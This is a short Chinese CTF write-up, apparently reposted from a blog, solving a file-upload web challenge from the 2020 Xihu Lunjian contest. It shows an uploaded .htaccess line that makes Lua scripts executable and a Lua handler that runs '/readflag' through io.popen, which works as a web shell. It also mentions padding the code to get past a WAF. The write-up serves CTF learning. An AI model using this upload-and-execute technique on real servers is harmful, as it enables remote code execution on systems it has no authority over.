zoukankan      html  css  js  c++  java
  • 2020西湖论剑一道web题[网盘]

    题目: 一个网盘系统

    图片:



    解题手法

    1. 上传".htaccess"文件,改成可以执行lua脚本

    内容为:

    SetHandler lua-script
    
    1. 编写lua脚本,而后进行get方式访问
    require "string"
    
    
    --[[
         This is the default method name for Lua handlers, see the optional
         function-name in the LuaMapHandler directive to choose a different
         entry point.
    --]]
    function handle(r)
        r.content_type = "text/plain"
    
    
        if r.method == 'GET' then
            local t = io.popen('/readflag')
            local a = t:read("*all")  --相当于t.read("*all"),读取所有内容
            r:puts(a)  -- 把a内容输出到屏幕上
            for k, v in pairs( r:parseargs() ) do
                r:puts( string.format("%s: %s
    ", k, v) )
            end
        elseif r.method == 'POST' then
            r:puts("Hello Lua World!
    ")
            for k, v in pairs( r:parsebody() ) do
                r:puts( string.format("%s: %s
    ", k, v) )
            end
        elseif r.method == 'PUT' then
    -- use our own Error contents
            r:puts("Unsupported HTTP method " .. r.method)
            r.status = 405
            return apache2.OK
        else
    -- use the ErrorDocument
            return 501
        end
        return apache2.OK
    end
    

    其实重要的代码就几行,但是代码太少会被服务器waf查掉。只能写多点了。

    最后访问上传上去的路径,即可得到flag



    搞CTF
  • 相关阅读:
    Business Objects 基础
    常用的bw基础知识
    SAP BW传输请求操作步骤
    FI/CO 财务基础知识
    SAP财务常用数据源概览
    HANA 和 SAP NetWeaver BW
    Request.QueryString中文乱码
    完全备份类型
    SQL Server备份属于I/O密集型操作
    SQL Server 通过发布订阅 实现数据库同步
  • 原文地址:https://www.cnblogs.com/beidaxmf/p/14541223.html
Copyright © 2011-2022 走看看